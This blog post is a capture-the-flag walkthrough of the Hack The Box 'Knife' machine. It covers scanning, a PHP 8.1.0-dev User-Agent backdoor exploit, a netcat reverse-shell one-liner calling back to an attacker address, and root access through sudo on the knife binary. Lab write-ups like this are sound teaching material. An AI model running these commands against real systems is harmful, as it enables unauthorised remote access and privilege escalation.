Subscribe to Blog via Email

Categories

Archives

CTF Challenges

Knife HacktheBox Walkthrough

Today we are going to solve the lab name as Knife –Hack the Box. The purpose is to accept the challenge to root the machine. Usage of sudo rights and remote code execution to pwn the victim’s machine.

Level: Easy

Table of Content

Network Scanning

  • Nmap

Enumeration

  • Nikto

Exploitation

  • RCE (Python)
  • user.txt

Privilege Escalation

  • Sudo Rights
  • root.txt

 

Kali: Attacker Machine

Victim’s Machine: HTB

Network Scanning

Run the Nmap to know the open ports and services.

nmap –A 10.129.223.91

As per the Nmap result, two ports are opened i.e. port 80 -HTTP and port 22 –SSH.

So now our only avenue of attack is through port 80 and port 22.

In the first look, we navigate port 80 in the web browser. But nothing informative we achieve here.

http://10.129.223.91

Enumeration

Without losing hope we move forward with the web scanner tool name as “Nikto” to get the vulnerability if any.Run the below command and output reveals the retrieved x-powered by the header as PHP/8.1.0-dev

nikto –h 10.129.223.91

Let’s Google the PHP8.1 exploit.

Above we find that PHP version 8.1 is vulnerable and allow us to do remote code execution. If this version runs on a server, an attacker can execute arbitrary code by sending the User-Agent header.

On exploit db, we get the exploit EBD –ID 49933 download the script from the below link and save it.

URL: https://www.exploit-db.com/exploits/49933

Exploitation

Execute the downloaded script on the kali and enter the full host URL of the victim’s machine (HTB machine). Simultaneously, run the netcat listener on port 1234 the next terminal.

nc –lvp 2334
python3 49933.py
http://10.129.223.91

In the above screenshot, we are getting the garbage issue in the shell. Let’s take a reliable shell.

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.100 1234 >/tmp/f

Wow!! On the netcat terminal, we have a session, and now the journey of enumeration starts and gets the user.txt.

But our hunger is for root.txt.Let’s proceed to the root flag.

I notice something interesting with sudo rights.

sudo -l

Privilege Escalation

As shown in the above screenshot, user James may run with /usr/bin/knife as a root because he has the sudo privileges with no password.

Let’s see what gtfobins said about the knife:

Knife: This is capable of running ruby code. If the binary is allowed to run as a superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.

Refer: https://gtfobins.github.io/gtfobins/knife/#sudo

Below is the command to run

sudo /usr/bin/knife exec -E 'exec "/bin/sh"'
cd /root
ls
cat root.txt

Finally, We capture the flag.

Author: Nisha Sharma is an Experienced and Certified Security Consultant.Highly skilled in Infrastructure, web pentesting along with SIEM and other security devices. Connect with her here